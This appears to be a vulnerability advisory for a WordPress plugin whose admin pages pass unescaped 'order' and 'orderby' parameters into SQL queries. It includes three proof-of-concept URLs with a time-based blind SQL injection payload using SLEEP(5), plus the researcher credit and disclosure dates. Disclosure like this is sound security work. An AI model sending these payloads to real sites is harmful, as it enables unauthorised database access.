The plugin did not validate or escape the order and orderby GET parameter in some of its admin dashboard pages, leading to Authenticated SQL Injections
https://example.com/wp-admin/admin.php?page=sbb_my-custom-submenu-page&orderby=1+AND+%28SELECT+4242+FROM+%28SELECT%28SLEEP%285%29%29%29aaa%29&order=asc https://example.com/wp-admin/admin.php?page=sbb_my-custom-submenu-page2&orderby=1+AND+%28SELECT+4242+FROM+%28SELECT%28SLEEP%285%29%29%29aaa%29&order=asc https://example.com/wp-admin/admin.php?page=sbb_my-custom-submenu-page3&orderby=1+AND+%28SELECT+4242+FROM+%28SELECT%28SLEEP%285%29%29%29aaa%29&order=asc
Martin Vierula of Trustwave
Yes
2021-08-06 (about 10 months ago)
2021-08-09 (about 10 months ago)
2022-04-24 (about 2 months ago)